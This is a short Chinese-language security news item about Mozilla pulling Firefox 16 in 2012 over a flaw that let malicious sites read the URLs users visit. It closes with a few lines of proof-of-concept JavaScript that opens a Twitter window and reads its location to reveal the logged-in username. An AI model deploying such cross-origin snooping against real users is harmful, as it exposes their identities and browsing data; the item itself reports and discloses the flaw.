Firefox 16漏洞的攻击代码公开

scheduled 2012-10-15 65407人围观 ,发现 3 个不明物体 资讯

就在Mozilla发布了正式版Firefox 16之后没几天,该公司对外发布消息–将暂时从Mozilla下载主页移除最新版本浏览器的下载,而这么做的原因源自于存在于其中的一个安全漏洞。Mozilla公司方面表示也会尽快地修复这一漏洞。从“移除”这一举动来看,此次的安全漏洞绝非小事,不过到目前为止还没有任何详细的消息公布。

早前,Mozilla安全保障部门的总监Michael Coates在网站上写道,“此次发现的漏洞将很可能导致一个恶意网站可以收集到用户访问过的网站、URL极其参数,到目前为止我们并没有发现有相关用户受到该漏洞的影响报告。”

另外,Mozilla建议用户可以将最新版的Firefox 16降级到15.0.1版本。

攻击代码:

function poc(){ 
var win = window.open('https://twitter.com/lists/', 'newWin', 'width=200, height=200'); 
setTimeout(function(){ 
alert('Hello '+/^https:\/\/twitter.com\/([^/]+)/.exec(win.location)[1]) }, 5000);
 }
发表评论

已有 3 条评论

取消
Loading...
css.php